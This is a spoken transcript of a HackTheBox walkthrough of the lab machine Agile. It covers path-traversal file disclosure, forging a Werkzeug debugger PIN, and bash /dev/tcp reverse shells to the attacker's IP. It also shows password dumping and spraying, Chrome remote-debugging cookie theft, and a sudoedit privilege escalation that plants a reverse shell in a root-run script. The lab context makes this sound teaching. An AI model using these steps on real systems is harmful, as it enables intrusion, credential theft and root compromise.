What's going on YouTube? This is IPSec. We're doing Agile from HackTheBox, which is all about a web-based password manager that's not really securing the passwords all that well because it just stores them in plain text. The website has two main vulnerabilities. The first one is a file disclosure vulnerability, so you can leak any file off the server, but that alone doesn't let you get code execution. The second vulnerability is it's running in debug mode. And it's a Flask app that has WorkZug deployed, and if you trigger an error message, you can do some online debugging through the web browser, but you need to know the PIN code. With the file disclosure vulnerability, it lets you leak all the secrets needed to generate that PIN code in order for you to use that debugger and get a shell on the box. With the shell, you discover that Chrome is running with some remote debugging things enabled, so you can view the web browser remotely with the SSH tunnel and get some secrets there. And then the next step is abusing a old sudo edit CVE, so let's just jump in. As always, we begin with nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it agile, and then the IP address of 10.10.11.203. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx, also running Ubuntu. And the HTTP title nmap script says there is a redirect to superpass.htb. So let's go add that into our host file. So sudo vi etc host. And then we can add 10.10.11.203 superpass.htb. And what I'm going to do is now go to 10.10.11.203. It will send us the redirect to Superpass, and this looks like a password manager website. We can see it's secure, fast, convenient. It's got the military grade crypto. It's definitely random and under Agile development. And it says they test and redeploy the website constantly. So I'm going to click on the get started, and then we can try logging in with like admin, and we get a SQL error, which is odd. We can see the statement it's using to log in. We can refresh it, and looks like login failed. I'm guessing that's the it constantly redeploying the app. Maybe it was redeploying when we try to log in, and that caused the error. I'm not exactly sure what went there, but it's not every time. I'm going to try registering an account though. So we're going to do IPSec and then a password of password. And we can add a password to the vault. So I'm going to add a password. We're going to add it as the name, superpass.htb. We can do IPSec and then hit enter, and it saves. So I'm going to grab a SSTI payload string. I always like going to this Cobalt page for it because they have one that fails on multiple languages. And that is this string right here. I should just save this to my box or something. I'm going to click add password, and I'm going to add that. I'm also going to add a double and single quote, and we're going to do that for everything, and then hit enter. It saves it. I'm going to refresh, and since it's not erroring out, if any of these fields, maybe it didn't have SSTI, like it was a blank field, I would assume that this was SSTI injectable or SQL injectable or something. But since the input is exactly as we put it in, I'm going to move on to the next thing. If I click export, it looks like it saves a file as superpass_export.csv. So I'm going to cat, it was in downloads, so we can do superpass export. And it just looks like a standard CSV. Also, all the SSTI is as we would expect. So the next step is let's examine exactly what this export button is doing. So I'm going to click on Burp Suite. Let's make sure we are intercepting. Intercept is set to on. I'm going to click on Export. And then let's go to Burp Suite. We see we get Vault Export. I can right click and I can say do intercept response to this request. So we can see what it's doing. It's sending us a 302 found and directing us to /download. And then fn is equal to IPSec export CSV. So I'm going to forward this to our browser, and we're going to make this request to the CSV. I'm going to send it over the repeater tab so we can just see the request. And then I'm going to try, let's do etc passwd and send it. And we get a 500 error. It is file not found, and the directory is temp/etc passwd, and it's a WorkZug debugger. If we went to the browser and did this, we could see exactly what it looks like. It's just that page we saw before with like the MySQL error. I gotta turn Burp Suite off now to hit this. But we have this. And if we click on this or click on the little console icon, it wants us to enter a PIN code. And we're going to have to generate a PIN. And when we do that, we can enter this console and run commands. So let's go back over to Burp Suite and make sure we can export files, because in order to generate this PIN, we need some information off the server, like the MAC address of the network interface and a few other things. But we'll get into that in just a minute. Let's confirm we have LFI. So since it's going to temp, I'm going to put 2 periods here. So it's going to be temp up 1 directory, then etc passwd. So doing that, and we can get this. So now we have confirmed we have file disclosure. If I said LFI before, that is wrong. That only happens when you execute files. That's the inclusion aspect of it. We just have a way to read files. So it's not LFI, it's a file disclosure, but a lot of people use those terms interchangeably, and I'm trying to get better at it, but I'm not there quite yet. So I'm going to Google WorkZug hack tricks, because WorkZug is the web server this is running. And Hacktricks does have a relatively nice guide on how to generate the PIN. So they have a script here. So I'm going to copy this, and we're going to call it genpin. So vgenpin.py, paste it in. And we're going to need to change these bits. So the public bits and the private bits. We need the username of the application. And it also gives pretty good details right here. So username, and we can get this one by looking at, I think it's proc self environ for environment. So proc self environ. And this is going to have the environment, and let's see, home directory, var dub, log name, dub data, user, dub data. So we know the username. So let's put this, and I'm going to edit this to be proc self environ, so we know where we got it. And then the mod name, they have Flask app. We want to go look at this file not found error. And we see it's flask app.py. So in Python directories, you use a period. So it is flask.app. That can stay the same. This one, it's running a Python command to get the app class. And that goes right here in the error message. So if this wasn't using WSGI, it was just a raw Python executing it, Flask would be here. But WSGI is a wrapper around the script that's executing Flask. So we need to change that to WSGI app. So where Flask is, we can put this. And I'm guessing probably public bits is because it's on this error message somewhere. I'm guessing they assume dub data is user, or maybe just 9 times out of 10, that's going to be the user executing a web server or something. Or maybe you see it in home, right? The user isn't really considered private. And now we need the file path of the error, and that's just going to be this entire line. Hopefully it is, at least. So I'm going to put this here. We can paste it. And now we need to get to the private bits. So it's going to do a UUID get node. And if we look at Hacktricks, get node is just going to be getting the MAC address. Let's see, what does it say? Here we go. MAC address of the current computer. So they tell us we want to get a sysclass net ENS33 address. And if we just did that, so let's try it. Was this in a place I can copy and paste? Let's see. We can go here. So we want to do ENS33. And this is actually not going to work. We get a file not found error. And I had got a MySQL error before, just refresh the page because MySQL is getting redeployed. So it doesn't exist because the interface is not ENS33. We can get the interface name by looking at the ARP table. I think that's procnet ARP. And we can get the interface name right here, which is ETH0. So we're going to change this to ETH0, and we get the MAC address. But it is in number format, so all we have to do is convert this. So we can do Python 3, print, and then I'm going to put a 0x and get rid of all these colons. And I don't want to put it in quotes because quotes is going to treat it as a string. If I just do this and don't put it in quotes, it's going to treat this as an integer, and we get 345 whatever. So now we have the MAC address. And then the final piece is the get machine ID. So if we look at this, let's see, private bits, get machine ID. It's a concatenate the values in etc machine ID or procsys kernel. So this is the OR statement with the first line of proc self C group after the last slash. And if we want, we can look at the machine code. It makes it a little bit more obvious what it's doing. This is going to be what get machine ID is. And we can see for file name, it's going to give both etc machine ID and procs whatever boot ID. It's going to try opening them first. And if it doesn't error, it's going to add the value or append the value to Linux. We see Linux defined up here. It's just a byte string. And that's going to break and exit this loop. So if etc machine ID exists, that's going to be what's there. If it does not exist, well, if it exists, it breaks and doesn't go to the next one. If this doesn't exist, it goes to the next one, and this will be the value. So let's see if etc machine ID works. And if for some reason I do this and get the wrong pin, then this is probably going to be the first value I try changing. So we can copy this. And we want to put it here. And going back to this, the next thing was the first line of proc self C group after the last slash. So I'm going to grab this. And here's the first line. Here's the last slash, and it's superpass.service. So I'm going to add this right here. And I'm going to run it. Actually, I lied. The very first thing I would change is probably the hashing algorithm, because we can see WorkZug prior to, I guess, 2 used MD5 and then SHA-1. So the first thing I change would be the hashing algorithm. The second thing I would change is the file name to be etc machine ID or boot ID. Just in case maybe like some weird virtual environment or something, or SE Linux prevented reading this file. But let's just run it now. So Python 3 gen pin, we have 250.848.104. So I'm going to go here. We can go back. I'm going to click on any Python execution or console thing, put this pin in, and we have a console ready. I think I had to click again to get it, or maybe I didn't, but now I can just do import OS, then os.system, and then bin bash -i, what is it, -c, then bash -i, there we go, that looks better, dev tcp 10.10.14.8, 9001, 0, and 1 like this. And let's set up the thing to catch it, so nclvnp 9001, hit enter. I don't get any response back because it's hung on this shell. So let's do Python 3-c, import pty spawn, bin bash. That looks good. And then I'm going to do stty-a, rows 31, columns 121. So stty, rows 31, cols 121 to fix that. And now we can export term is equal to xterm. So we can clear the screen. Or I thought we could. Huh. Export term. Is it capital like this? I wonder if my TTY got screwed up. 31, 121. It looks fine enough. We can proceed. So the very first thing I want to do is check the MySQL database because this is a password manager. So I want to dump all the passwords. I'm going to go in superpass. And then if I cat app.py, let's see, is there any type of DB? Setup DB, we got a load config. So I'm going to grep-r load underscore config. Let's see. It is in app.py as well. So let's do less app.py, vim app.py, and let's look at load config. And we can see config path is os.getEnvironment config path. So I definitely screwed my terminal up somehow, but oh, I didn't do stty raw minus echo fg. That's why my terminal's acting wonky. There we go. Now it's all fixed. But we won't look at the environment because we want to get where the config is. So we have config path app config prod JSON. We need to cat this file, not the whole thing like that. There we go. Is JQ installed in this box? It isn't. We can eyeball it easily enough, but we could also copy the string, then echo-n, paste JQ dot, and we can see the connection info. Let's see, superpass user, and this is the password. So I'm going to go back here, mysql-u superpass user-p, enter the password, and we can do show databases, use superpass, and then show tables. Let's select star from passwords, and I'm going to select username, password from passwords. And we have a list of username and passwords. I don't know if these are SHA or anything. Let's just do an echo-n, wc-c. It's only 20 characters. I don't know anything off the top of my head that's a 20 character hash. So I'm going to assume this is all plain text. So we have all the passwords. Oddly enough, we don't have the passwords of my user, but I'm not sure why. So let's add the users. So I'm just going to delete everything off these lines. And I'm going to create a separate file for passwords.txt. Put this in. Let's do a search and replace for pipe. Get rid of everything. Delete all the users. Do another sed. And if you're confused, look in the bottom left. That's where I'm typing. I just got rid of all the spaces. So now I'm left with two files, users.txt, passwords.txt, and I can throw these into crackmap exec. So CME, SSH, 10.10.11.203, -u, users, -p, passwords. I'm going to do -h because there is another option. I'm going to add the -- no brute force, which means it doesn't spray. If I didn't have this flag, it would go with the very first line of users.txt, try every single password, go to the next line, try every single password. No brute force means it's going to try line 1 of user.txt with line 1 of password.txt, line 2 of user.txt with line 2 of password.txt, and so on. So let's run this. And it will probably take 2 to 3 seconds per attempt. It's trying to log in with OXDF right now on the first 2 passwords. Then it's going to try the quorum user with all the passwords, and we can see authentication failed. And now we're at the last one where we have shell access. So let's SSH as quorum to this box. So SSH quorum at 10.10.11.203. Put in the password. And we are on the box. We have user.txt. As always, the first thing I like running is sudo-l just to see if there's any sudo rules, especially when I have the password, and I can just paste that in, and we see we're not allowed to run sudo. So the next thing I like is a ps-ef-forest command. Pipe it over to less. I normally do less-S, but we see the command is not found. So let's just do --forest. And what the less-s would do would be let us see what's more to the right. But if we see anything interesting, we can just do a ps-ef grep on it, and we'll get all that information anyways. So let's look at this. I think we have two versions of the application running. We have one on port 5000, one on 5555. So let's see, vnotes, 5000 and 5555 is equal to Python. So we have two Python applications running, which is definitely interesting. They're both using probably WSGI. I can see the WS right here. We see G Unicorn as well. 5000, this is definitely us because we can see my reverse shell. So we can say 5000 equals public site. I don't know what 5555 is. We could probably grep 5555 on Etsy and do a -R. And we can see there is a superpass-test.nginx listening on that. So if we looked at these nginx files, so we can cat this, we can see it's only exposed to localhost, and it's going to app testing superpass static. So we have a second application running here. If we looked at just superpass.nginx, this is going to be the main site on 5000. And we can see it has listen 127.0.0.1, but also listen 80. So it's going to be exposed to the internet. But let's go back to that force command, because I always hate just going after the very first thing. We could show like enumerating and running into a brick wall here because we don't have information to log into the test site. So going back up through this output, let's see, what do we see? I didn't see what I saw the last time. So there is a cron running. This is the last time I ran it. I'm guessing the second time I ran ps-ef forest, the cron was not there. But we can see there is a app and then test and update.sh script, and it's running this. And it's as the runner user. So I'm going to do a ps-ef, and I'm just going to grep on runner. And I don't see Chrome running. Let's see. I am not sure why that is not running. Let's just do a reverse search for Chrome. Let's see. So we should just go into this app test and update.sh. Maybe I got lucky on this ps-ef force command when I did this. But we have this app directory. If we looked here, you'd see this test and update.sh. And we see, let's see, ps-aux, app testing. It's going to source VM bin activate, then run pytest. And then if all the tests are good, it's going to copy superpass to app. So let's go into app testing. If we go into tests, we have the functional tests, and there is a creds.text, and we get permission denied, but there is a test site interactively.py, which I'm going to open in Vim. So we have syntax highlighting, and we can see it's going to use Selenium, which is like a way to interact with the web browser through programming languages. And it's going to run Chrome on port with remote debugging on port 41829. So I'm going to check if this port is open, and then it's going to test login and get to this page. So this is just using Selenium to test the website. So let's do sslntp, and I'm going to do grep on 41829, and we do see it's listening. I'm going to do a ps-ef grep on runner as well, and we can see now we have actually ran this when Chrome is running. And let's see, there is the flag remote debugging port 41829. So what I'm going to do is undo the squiggly C, but it has to be the very first thing you type after enter. And then I can do a local port forward. So we'll do 41829 to 127.0.0.1, 41829. So we're taking this port and listening on it on our host, right? So if I do NC, we'll do SSLNTP, grep 41829. We're not listening, hit enter up here. And now I've established a tunnel on my local host. If I connect to this port, it's going to send me to the remote debugging over here. So now I can do Chromium. And I'm using Chromium because that's what is able to access this debugger. I'm going to do Chrome, then inspect. And let's discover network targets. I'm going to do localhost. What was the port? 41829. And then click done. And we see we have a web browser here. So I can do inspect, and we can see the actual web page of the user. And it looks like my Chrome remembered I was in application cookies. I think it would start probably looking like this on your computer, or maybe in the console. But if you go in here, and we can go to the application tab, then go to cookies, then test.superpass, and we can get the session and remember token. I'm going to copy these both real quick. So v test, I'm just going to put that, and we'll put this as well. And you could try to control the browser. I first tried like file, etc, passwd, but I think the file wrapper is disabled, but you can use this to navigate around the website. I bet if we went to /vault, internal server error, what was the URL? So that's download, superpass.htb/vault. There we go. And we could zoom in potentially and see there are credentials here. We could probably type this, but I'm going to log in because we stole the cookies, right? I bet we could also do like, what was it? Export. What was the download command? Let's see, /download, then fn. Download, $fn is equal to etc passwd. Is this still here? We don't have permission. So it looks like this version of the application does have that patched. But let's just log in so I can copy and paste this information. I bet. Can I do this? Oh, we could copy and paste this way, right? But I'm going to forward the port just so we can show you that. But you could also get the information this way, which is pretty cool. So I'm going to go back to my SSH session. And we said it was port 5555. So I'm going to hit enter. Then, whoops, Control C, or squiggly C, then 5555, 127.0.0.1, 5555. So now we are listening on that. If I go to my host, do sudo vi etc host, and I want to add test.superpass.htb, and I'm going to go there, 5555. Yes, take me to test.superpass.htb. Actually, I need localhost. So 127.0.0.1 is test.superpass.htb. Hit enter, unable to connect. So let's try a curl test.superpass.htb : 5555. And we do get a site. If I refresh, I get a site now. So maybe it was like a weird DNS caching thing though. So we're in the dev version of the site. I can hit F12 and then we can add the cookies. So I'm going to hit F12 here just to get the cookie name. We want remember token. So let's see. I can do plus, I think. Let's see. Delete all. How do I add a cookie? I know there's a way. I wonder if I've always been using like an add-on to add cookies. It says view and edit cookies. So I wonder if we can't add. We could probably do login, register. Then let's create a user IPsec password. So now we definitely have a cookie. And we have a lot of cookies. That's weird that set all of those. But we have the remember token and everything. So let's go back. We put the information here. This was the remember token. I'm just know that because it started with a number and then a pipe. So we got the remember token, and now we want to grab the session. So we can get session, paste this in, and when we refresh the site, we should be a different user, and we got two names. We got Edwards and D. Edwards. And this one is for Agile. I'm just going to test this login. Let's go. Let's see. Do we have CME output here? We can do -p, put this password, and -u. I'm going to try Edwards. And if the file does not exist, it just uses the string. And Edwards does have shell access. So you can do SSH Edwards at 10.10.11.203. Paste in the password. And wrong password. I wonder what's on my clipboard. Let's just copy and paste it again. I probably accidentally copied something. And now we're Edwards on Agile. And we can execute sudo edit on the config test and also these creds. So if I do, let's see, sudo -u dev admin, and then sudo edit, we can look at the creds file that we previously could not have. That was open new tab. Let's close that. Copy, paste, and we can see this. We could try that for the root password, but it is not. So looking back at this, we can see who owns these actual directories, because if it is any user we control, we can probably remove the file and then put a symlink in there and then do sudo edit on actual files. So we do lsla. This is the runner user, which we don't have access to. Maybe if we found a way to exploit the Chrome debug to get a shell, we would be able to, but I'm not sure if we can. Let's just look at /app. That is root owned. So I don't think we have any way to edit those files unless the path is actually exploiting the Google debug to get a shell. Let's see. The other thing we do is potentially attack sudo edit. So I'm going to do sudo edit -v. Let's do -V, and we can see the sudo version is 199. So let's go and Google sudo edit vulnerability 199. See if we get anything. This is 180 to 1912. So we definitely have a vulnerability here. And let's see what it's doing. Opening sudoers file. So what it does is changes the editor. So we do vim -- and then etc sudoers. So now when sudo edit tries to run any commands, instead it's going to open this file. So let's try this. We want to do editor like this. And is there any variables? Matching defaults, secure path. It is doing an end reset, so I don't know if this will work. So now we can do the sudo like this, and that did not seem to work. Says it doesn't need to be ran that way. Edwards is not able to access that. And I think the reason why we got that error is because we dropped the -u argument. If we noticed, we had a -u dev admin on this when we did sudo -u. So I'm going to go back here with sudo edit. We'll do -u, put dev admin, and we can open the file as dev admin. And I thought it was supposed to go, we did the editors. I wonder if I have to put that on this line. Editor equals vim etc sudo-wars. Oh, I'm not sure if you could see that. And it definitely switched out of nano. So I guess we had to do it this way. For some reason, it didn't pick up the environment variable, but we got a permission denied right away. So we can only read files owned by dev admin. So let's do a find /-user dev admin and pipe all errors to dev null. So we can just see what files are owned by him. And we have functional creds, and then we have config prod.json and config test.json. So let's cat config prod. Well, let's do sudo-l real quick. So we could edit config test already. So the only thing we really have access to is being able to read config prod, unless there's other files that we missed, because we can also edit files with the group dev admin as well. And here we have app-vm bin activate. So if we cat this file, this is going to be the virtual environment variable that activates the virtual environment. And if we go all the way back to cat/app, what was it? Test and update. This script, which is, I think, what gets executed by root to start the whole cron process with the Selenium stuff, we see it doing a source on this file. So since we can edit this file, or at least the group is a member of it, we can see dev admin has read write. We can go and do our exploit here, or the editor of vim, and replace it with app-vm bin activate. So since we can edit this file, we should be able to just put a reverse shell here. This is all bash, so bash-c, bash-i, like this, dev tcp 10.10.14.8, 0 and 1 like that. We can save it and see lvnp 9001, and I forgot the port. So save. Then if I cat the app bin activate, we'll just do head. We can see my script is there. So anytime, oh, I had a space there. There we go. So anytime someone runs this script, it should send a reverse shell. We have permission denied. I think they do source like this. We got it as Edwards. So I'm going to listen. Let's look at the date. So if it runs every minute, which it does, we got a shell as root. So now we can get root.txt, and that will be the box. So hope you guys enjoyed it. Take care, and I will see you all next time.